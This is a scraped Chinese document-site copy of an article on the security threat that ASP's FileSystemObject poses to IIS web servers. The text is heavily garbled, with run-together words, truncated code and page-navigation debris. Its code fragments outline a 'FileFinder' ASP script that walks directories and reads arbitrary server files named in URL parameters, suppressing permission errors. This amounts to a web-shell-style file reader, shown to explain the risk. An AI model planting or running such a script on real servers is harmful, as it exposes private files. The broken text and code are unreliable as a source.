asp中fso對(duì)象對(duì)iis web服務(wù)器數(shù)據(jù)安全的威脅及對(duì)策--

《asp中fso對(duì)象對(duì)iis web服務(wù)器數(shù)據(jù)安全的威脅及對(duì)策--》由會(huì)員上傳分享，免費(fèi)在線閱讀，更多相關(guān)內(nèi)容在應(yīng)用文檔-天天文庫(kù)。

1、ASP中FSO對(duì)象對(duì)IISWEB服務(wù)器數(shù)據(jù)安全的威脅及對(duì)策>>scripting.filesystemobject對(duì)象是由scrrun.dll提供的許多供vbscript/jscript控制的對(duì)象之一。scripting.filesystemobject提供了非常便利的文本文件和文件目錄的訪問(wèn)，但是同時(shí)也對(duì)iisndimothisfolderdimofoldersdimofilesdimofolderdimofile’如果系統(tǒng)管理員對(duì)文件系統(tǒng)的權(quán)限進(jìn)行細(xì)致的設(shè)置話，下面的代碼就要出錯(cuò)’但是有些目錄還是可以察看的，所以我們簡(jiǎn)單的把錯(cuò)誤忽略過(guò)去onerrorre

2、sumenextn=0response.p;strstartfolder"</b><br>"setothisfolder=g_fs.getfolder(strstartfolder)setofiles=othisfolder.filesforeachofileinofiles’如果是指定的文件擴(kuò)展名，輸出連接導(dǎo)向本身，但用不同的命令cmd’在這里是cmd=read，即讀出指定物理路徑的文本文件ifissuffix(ofile.path,strext)thenresponse.d=readpath="server.htmlencode(

3、ofile.path)"’><fontcolor=’dodgerblue’>"ofile.path"</font></a><br>"iferr=0thenn=n+1endifendifnextsetofolders=othisfolder.subfoldersforeachofolderinofoldersn=n+findfiles(ofolder.path,strext)nextfindfiles=nendfunction下面的代碼是對(duì)url后面的參數(shù)進(jìn)行分析：’讀出各個(gè)參數(shù)的值strcmd=ucase

4、(request.querystring("cmd"))strpath=request.querystring("path")strext=request.querystring("ext")brad執(zhí)行不同的代碼selectcasestrcmdcase"find"response.p;"file(s)found"case"read"ifbrap;server.htmlencode(readtextfile(strpath))"</pre>"endifcaseelseresponse.write"<h3>please12下一頁(yè)>>>>

5、這篇文章來(lái)自..，。specifyamandtoexecute</h3>"endselect從上面的分析可以看出，如果有足夠的權(quán)限的話，我們就可以通過(guò)filefinder來(lái)查找iise還是別的什么用戶(hù)，都可以順列的讀取目錄和文件的信息。而大多數(shù)l申請(qǐng)的個(gè)人主頁(yè)卻沒(méi)有這個(gè)問(wèn)題，可見(jiàn)這個(gè)免費(fèi)asp主頁(yè)提供商在這方面做的還是比較認(rèn)真的。盡管domaindlx的object的對(duì)文件系統(tǒng)操作的功能，不管什么平臺(tái)應(yīng)該存在同樣的問(wèn)題。上一頁(yè)12>>>>這篇文章來(lái)自..，。